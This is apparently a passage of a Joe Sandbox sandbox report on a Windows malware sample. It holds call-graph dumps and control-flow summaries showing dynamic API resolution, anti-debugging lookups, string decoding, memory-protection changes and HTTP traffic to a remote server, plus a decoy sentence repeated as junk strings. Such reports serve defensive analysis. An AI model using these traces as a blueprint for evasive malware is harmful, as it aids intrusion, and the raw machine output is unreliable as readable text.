lstrcpy 38945->38948 38946 71aa50 lstrcpy 38946->38971 38947 71abb0 lstrcpy 38947->38971 38950 715bed 38948->38950 38951 7016b0 lstrcpy 38949->38951 38953 71ab30 2 API calls 38950->38953 38970 715a61 38951->38970 38952 71ab30 lstrlen lstrcpy 38952->38971 38954 715bfb 38953->38954 38957 71ab30 2 API calls 38954->38957 38955 715c5b StrCmpCA 38958 715c66 Sleep 38955->38958 38959 715c78 38955->38959 38956 71aab0 lstrcpy 38956->38971 38961 715c0a 38957->38961 38958->38971 38960 71abb0 lstrcpy 38959->38960 38962 715c84 38960->38962 38963 7016b0 lstrcpy 38961->38963 38964 71ab30 2 API calls 38962->38964 38963->38970 38965 715c93 38964->38965 38966 71ab30 2 API calls 38965->38966 38967 715ca2 38966->38967 38969 7016b0 lstrcpy 38967->38969 38968 7159da StrCmpCA 38968->38971 38969->38970 38970->38026 38971->38934 38971->38935 38971->38936 38971->38937 38971->38943 38971->38946 38971->38947 38971->38952 38971->38955 38971->38956 38971->38968 38972 715b8f StrCmpCA 38971->38972 38973 715440 20 API calls 38971->38973 38972->38971 38973->38971 38975 7176e3 GetVolumeInformationA 38974->38975 38976 7176dc 38974->38976 38977 717721 38975->38977 38976->38975 38978 71778c GetProcessHeap RtlAllocateHeap 38977->38978 38979 7177a9 38978->38979 38980 7177b8 wsprintfA 38978->38980 38981 71aa50 lstrcpy 38979->38981 38982 71aa50 lstrcpy 38980->38982 38983 715ff7 38981->38983 38982->38983 38983->38047 38985 71aab0 lstrcpy 38984->38985 38986 7048e9 38985->38986 39187 704800 38986->39187 38988 7048f5 38989 71aa50 lstrcpy 38988->38989 38990 704927 38989->38990 38991 71aa50 lstrcpy 38990->38991 38992 704934 38991->38992 38993 71aa50 lstrcpy 38992->38993 38994 704941 38993->38994 38995 71aa50 lstrcpy 38994->38995 38996 70494e 38995->38996 38997 71aa50 lstrcpy 38996->38997 38998 70495b InternetOpenA StrCmpCA 38997->38998 38999 704994 38998->38999 39000 704f1b InternetCloseHandle 38999->39000 39193 718cf0 38999->39193 39002 704f38 39000->39002 39208 70a210 CryptStringToBinaryA 39002->39208 39003 
7049b3 39201 71ac30 39003->39201 39007 7049c6 39008 71abb0 lstrcpy 39007->39008 39013 7049cf 39008->39013 39009 71ab30 2 API calls 39010 704f55 39009->39010 39011 71acc0 4 API calls 39010->39011 39014 704f6b 39011->39014 39012 704f77 ctype 39016 71aab0 lstrcpy 39012->39016 39017 71acc0 4 API calls 39013->39017 39015 71abb0 lstrcpy 39014->39015 39015->39012 39029 704fa7 39016->39029 39018 7049f9 39017->39018 39019 71abb0 lstrcpy 39018->39019 39020 704a02 39019->39020 39021 71acc0 4 API calls 39020->39021 39022 704a21 39021->39022 39023 71abb0 lstrcpy 39022->39023 39024 704a2a 39023->39024 39025 71ac30 3 API calls 39024->39025 39026 704a48 39025->39026 39027 71abb0 lstrcpy 39026->39027 39028 704a51 39027->39028 39030 71acc0 4 API calls 39028->39030 39029->38050 39031 704a70 39030->39031 39032 71abb0 lstrcpy 39031->39032 39033 704a79 39032->39033 39034 71acc0 4 API calls 39033->39034 39035 704a98 39034->39035 39036 71abb0 lstrcpy 39035->39036 39037 704aa1 39036->39037 39038 71acc0 4 API calls 39037->39038 39039 704acd 39038->39039 39040 71ac30 3 API calls 39039->39040 39041 704ad4 39040->39041 39042 71abb0 lstrcpy 39041->39042 39043 704add 39042->39043 39044 704af3 InternetConnectA 39043->39044 39044->39000 39045 704b23 HttpOpenRequestA 39044->39045 39047 704b78 39045->39047 39048 704f0e InternetCloseHandle 39045->39048 39049 71acc0 4 API calls 39047->39049 39048->39000 39050 704b8c 39049->39050 39051 71abb0 lstrcpy 39050->39051 39052 704b95 39051->39052 39053 71ac30 3 API calls 39052->39053 39054 704bb3 39053->39054 39055 71abb0 lstrcpy 39054->39055 39056 704bbc 39055->39056 39057 71acc0 4 API calls 39056->39057 39058 704bdb 39057->39058 39059 71abb0 lstrcpy 39058->39059 39060 704be4 39059->39060 39061 71acc0 4 API calls 39060->39061 39062 704c05 39061->39062 39063 71abb0 lstrcpy 39062->39063 39064 704c0e 39063->39064 39065 71acc0 4 API calls 39064->39065 39066 704c2e 39065->39066 39067 71abb0 lstrcpy 39066->39067 39068 704c37 39067->39068 39069 71acc0 4 API calls 
39068->39069 39070 704c56 39069->39070 39071 71abb0 lstrcpy 39070->39071 39072 704c5f 39071->39072 39073 71ac30 3 API calls 39072->39073 39074 704c7d 39073->39074 39075 71abb0 lstrcpy 39074->39075 39076 704c86 39075->39076 39077 71acc0 4 API calls 39076->39077 39078 704ca5 39077->39078 39079 71abb0 lstrcpy 39078->39079 39080 704cae 39079->39080 39081 71acc0 4 API calls 39080->39081 39082 704ccd 39081->39082 39083 71abb0 lstrcpy 39082->39083 39084 704cd6 39083->39084 39085 71ac30 3 API calls 39084->39085 39086 704cf4 39085->39086 39087 71abb0 lstrcpy 39086->39087 39088 704cfd 39087->39088 39089 71acc0 4 API calls 39088->39089 39090 704d1c 39089->39090 39091 71abb0 lstrcpy 39090->39091 39092 704d25 39091->39092 39093 71acc0 4 API calls 39092->39093 39094 704d46 39093->39094 39095 71abb0 lstrcpy 39094->39095 39096 704d4f 39095->39096 39097 71acc0 4 API calls 39096->39097 39098 704d6f 39097->39098 39099 71abb0 lstrcpy 39098->39099 39100 704d78 39099->39100 39101 71acc0 4 API calls 39100->39101 39102 704d97 39101->39102 39103 71abb0 lstrcpy 39102->39103 39104 704da0 39103->39104 39105 71ac30 3 API calls 39104->39105 39106 704dbe 39105->39106 39107 71abb0 lstrcpy 39106->39107 39108 704dc7 39107->39108 39109 71aa50 lstrcpy 39108->39109 39110 704de2 39109->39110 39111 71ac30 3 API calls 39110->39111 39112 704e03 39111->39112 39113 71ac30 3 API calls 39112->39113 39114 704e0a 39113->39114 39115 71abb0 lstrcpy 39114->39115 39116 704e16 39115->39116 39117 704e37 lstrlen 39116->39117 39118 704e4a 39117->39118 39119 704e53 lstrlen 39118->39119 39207 71ade0 39119->39207 39121 704e63 HttpSendRequestA 39122 704e82 InternetReadFile 39121->39122 39123 704eb7 InternetCloseHandle 39122->39123 39124 704eae 39122->39124 39127 71ab10 39123->39127 39124->39122 39124->39123 39126 71acc0 4 API calls 39124->39126 39128 71abb0 lstrcpy 39124->39128 39126->39124 39127->39048 39128->39124 39214 71ade0 39129->39214 39131 711a14 StrCmpCA 39132 711a1f ExitProcess 39131->39132 39144 711a27 
39131->39144 39133 711c12 39133->38052 39134 711afd StrCmpCA 39134->39144 39135 711b1f StrCmpCA 39135->39144 39136 711b41 StrCmpCA 39136->39144 39137 711ba1 StrCmpCA 39137->39144 39138 711bc0 StrCmpCA 39138->39144 39139 711b63 StrCmpCA 39139->39144 39140 711b82 StrCmpCA 39140->39144 39141 711aad StrCmpCA 39141->39144 39142 711acf StrCmpCA 39142->39144 39143 71ab30 lstrlen lstrcpy 39143->39144 39144->39133 39144->39134 39144->39135 39144->39136 39144->39137 39144->39138 39144->39139 39144->39140 39144->39141 39144->39142 39144->39143 39145->38058 39146->38060 39147->38066 39148->38068 39149->38074 39150->38076 39151->38080 39152->38084 39153->38088 39154->38094 39155->38096 39156->38100 39157->38113 39158->38118 39159->38117 39160->38114 39161->38117 39162->38134 39163->38120 39164->38124 39165->38125 39166->38130 39167->38136 39168->38138 39169->38145 39170->38147 39171->38171 39172->38175 39173->38174 39174->38170 39175->38174 39176->38184 39179 71aab0 lstrcpy 39178->39179 39180 7016c3 39179->39180 39181 71aab0 lstrcpy 39180->39181 39182 7016d5 39181->39182 39183 71aab0 lstrcpy 39182->39183 39184 7016e7 39183->39184 39185 71aab0 lstrcpy 39184->39185 39186 7015a3 39185->39186 39186->38911 39188 704816 39187->39188 39189 704888 lstrlen 39188->39189 39213 71ade0 39189->39213 39191 704898 InternetCrackUrlA 39192 7048b7 39191->39192 39192->38988 39194 71aa50 lstrcpy 39193->39194 39195 718d04 39194->39195 39196 71aa50 lstrcpy 39195->39196 39197 718d12 GetSystemTime 39196->39197 39199 718d29 39197->39199 39198 71aab0 lstrcpy 39200 718d8c 39198->39200 39199->39198 39200->39003 39202 71ac41 39201->39202 39203 71ac98 39202->39203 39205 71ac78 lstrcpy lstrcat 39202->39205 39204 71aab0 lstrcpy 39203->39204 39206 71aca4 39204->39206 39205->39203 39206->39007 39207->39121 39209 70a249 LocalAlloc 39208->39209 39210 704f3e 39208->39210 39209->39210 39211 70a264 CryptStringToBinaryA 39209->39211 39210->39009 39210->39012 39211->39210 39212 70a289 LocalFree 39211->39212 
39212->39210 39213->39191 39214->39131 39215 c48896 39216 c48921 VirtualProtect 39215->39216 39218 c493e5 39216->39218

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 660 719bb0-719bc4 call 719aa0 663 719de3-719e42 LoadLibraryA * 5 660->663 664 719bca-719dde call 719ad0 GetProcAddress * 21 660->664 666 719e44-719e58 GetProcAddress 663->666 667 719e5d-719e64 663->667 664->663 666->667 669 719e96-719e9d 667->669 670 719e66-719e91 GetProcAddress * 2 667->670 671 719eb8-719ebf 669->671 672 719e9f-719eb3 GetProcAddress 669->672 670->669 673 719ec1-719ed4 GetProcAddress 671->673 674 719ed9-719ee0 671->674 672->671 673->674 675 719f11-719f12 674->675 676 719ee2-719f0c GetProcAddress * 2 674->676 676->675
                                  APIs
                                  • GetProcAddress.KERNEL32(75900000,011D0E18), ref: 00719BF1
                                  • GetProcAddress.KERNEL32(75900000,011D0D10), ref: 00719C0A
                                  • GetProcAddress.KERNEL32(75900000,011D0E30), ref: 00719C22
                                  • GetProcAddress.KERNEL32(75900000,011D0ED8), ref: 00719C3A
                                  • GetProcAddress.KERNEL32(75900000,011D0D28), ref: 00719C53
                                  • GetProcAddress.KERNEL32(75900000,011D9160), ref: 00719C6B
                                  • GetProcAddress.KERNEL32(75900000,011C5320), ref: 00719C83
                                  • GetProcAddress.KERNEL32(75900000,011C5480), ref: 00719C9C
                                  • GetProcAddress.KERNEL32(75900000,011D0D40), ref: 00719CB4
                                  • GetProcAddress.KERNEL32(75900000,011D0DA0), ref: 00719CCC
                                  • GetProcAddress.KERNEL32(75900000,011D0EC0), ref: 00719CE5
                                  • GetProcAddress.KERNEL32(75900000,011D0F38), ref: 00719CFD
                                  • GetProcAddress.KERNEL32(75900000,011C5340), ref: 00719D15
                                  • GetProcAddress.KERNEL32(75900000,011D0DB8), ref: 00719D2E
                                  • GetProcAddress.KERNEL32(75900000,011D0DE8), ref: 00719D46
                                  • GetProcAddress.KERNEL32(75900000,011C54A0), ref: 00719D5E
                                  • GetProcAddress.KERNEL32(75900000,011D0E48), ref: 00719D77
                                  • GetProcAddress.KERNEL32(75900000,011D0FF8), ref: 00719D8F
                                  • GetProcAddress.KERNEL32(75900000,011C54E0), ref: 00719DA7
                                  • GetProcAddress.KERNEL32(75900000,011D0F68), ref: 00719DC0
                                  • GetProcAddress.KERNEL32(75900000,011C5360), ref: 00719DD8
                                  • LoadLibraryA.KERNEL32(011D1028,?,00716CA0), ref: 00719DEA
                                  • LoadLibraryA.KERNEL32(011D0F80,?,00716CA0), ref: 00719DFB
                                  • LoadLibraryA.KERNEL32(011D0FE0,?,00716CA0), ref: 00719E0D
                                  • LoadLibraryA.KERNEL32(011D1010,?,00716CA0), ref: 00719E1F
                                  • LoadLibraryA.KERNEL32(011D0F98,?,00716CA0), ref: 00719E30
                                  • GetProcAddress.KERNEL32(75070000,011D0FB0), ref: 00719E52
                                  • GetProcAddress.KERNEL32(75FD0000,011D0FC8), ref: 00719E73
                                  • GetProcAddress.KERNEL32(75FD0000,011D93C8), ref: 00719E8B
                                  • GetProcAddress.KERNEL32(75A50000,011D9440), ref: 00719EAD
                                  • GetProcAddress.KERNEL32(74E50000,011C52A0), ref: 00719ECE
                                  • GetProcAddress.KERNEL32(76E80000,011D9220), ref: 00719EEF
                                  • GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 00719F06
                                  Strings
                                  • NtQueryInformationProcess, xrefs: 00719EFA
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$LibraryLoad
                                  • String ID: NtQueryInformationProcess
                                  • API String ID: 2238633743-2781105232
                                  • Opcode ID: 8b6233f69813404545da94bea2c4bf37b60529650eb69e4df7ee5b1035ccabf4
                                  • Instruction ID: 89210d254c815b762648eaf3b90ba9246a718e01c74ac5ab6a3645a8f8049d5f
                                  • Opcode Fuzzy Hash: 8b6233f69813404545da94bea2c4bf37b60529650eb69e4df7ee5b1035ccabf4
                                  • Instruction Fuzzy Hash: 45A13DB65BE2509FC344DFE8FC88956BBA9A74D301710861BBA19C3274E734A5C0EF60

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 764 704610-7046e5 RtlAllocateHeap 781 7046f0-7046f6 764->781 782 7046fc-70479a 781->782 783 70479f-7047f9 VirtualProtect 781->783 782->781
                                  APIs
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 0070465F
                                  • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 007047EC
                                  Strings
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00704638
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00704672
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007047C0
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00704784
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0070467D
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007047AA
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007046A7
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00704712
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007047CB
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0070476E
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007046FC
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00704763
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007046B2
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00704688
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00704693
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007047B5
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00704779
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00704617
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0070478F
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0070471D
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00704667
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007046C8
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007046D3
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00704622
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0070462D
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0070479F
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00704643
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00704728
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 007046BD
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00704707
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateHeapProtectVirtual
                                  • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                  • API String ID: 1542196881-2218711628
                                  • Opcode ID: 3acddb8c2dccb6c610f4940a3bba6daa31f7b28a40bd3c517e76f32cbc1ba9d5
                                  • Instruction ID: cccdebf45ab648a64cfc572665c309c5943593b2546ae94a163679d69ee8fa3a
                                  • Opcode Fuzzy Hash: 3acddb8c2dccb6c610f4940a3bba6daa31f7b28a40bd3c517e76f32cbc1ba9d5
                                  • Instruction Fuzzy Hash: 5F4108A06C26547EE634FFA4A842D9D76767F42708F417140F8007A286C67C7A674FA9

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1033 7062d0-70635b call 71aab0 call 704800 call 71aa50 InternetOpenA StrCmpCA 1040 706364-706368 1033->1040 1041 70635d 1033->1041 1042 706559-706575 call 71aab0 call 71ab10 * 2 1040->1042 1043 70636e-706392 InternetConnectA 1040->1043 1041->1040 1061 706578-70657d 1042->1061 1044 706398-70639c 1043->1044 1045 70654f-706553 InternetCloseHandle 1043->1045 1047 7063aa 1044->1047 1048 70639e-7063a8 1044->1048 1045->1042 1050 7063b4-7063e2 HttpOpenRequestA 1047->1050 1048->1050 1053 706545-706549 InternetCloseHandle 1050->1053 1054 7063e8-7063ec 1050->1054 1053->1045 1056 706415-706455 HttpSendRequestA HttpQueryInfoA 1054->1056 1057 7063ee-70640f InternetSetOptionA 1054->1057 1059 706457-706477 call 71aa50 call 71ab10 * 2 1056->1059 1060 70647c-70649b call 718ad0 1056->1060 1057->1056 1059->1061 1066 706519-706539 call 71aa50 call 71ab10 * 2 1060->1066 1067 70649d-7064a4 1060->1067 1066->1061 1071 7064a6-7064d0 InternetReadFile 1067->1071 1072 706517-70653f InternetCloseHandle 1067->1072 1076 7064d2-7064d9 1071->1076 1077 7064db 1071->1077 1072->1053 1076->1077 1080 7064dd-706515 call 71acc0 call 71abb0 call 71ab10 1076->1080 1077->1072 1080->1071
                                  APIs
                                    • Part of subcall function 0071AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0071AAF6
                                    • Part of subcall function 00704800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00704889
                                    • Part of subcall function 00704800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00704899
                                    • Part of subcall function 0071AA50: lstrcpy.KERNEL32(00720E1A,00000000), ref: 0071AA98
                                  • InternetOpenA.WININET(00720DFF,00000001,00000000,00000000,00000000), ref: 00706331
                                  • StrCmpCA.SHLWAPI(?,011DE920), ref: 00706353
                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00706385
                                  • HttpOpenRequestA.WININET(00000000,GET,?,011DE3B0,00000000,00000000,00400100,00000000), ref: 007063D5
                                  • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 0070640F
                                  • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00706421
                                  • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 0070644D
                                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 007064BD
                                  • InternetCloseHandle.WININET(00000000), ref: 0070653F
                                  • InternetCloseHandle.WININET(00000000), ref: 00706549
                                  • InternetCloseHandle.WININET(00000000), ref: 00706553
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmp
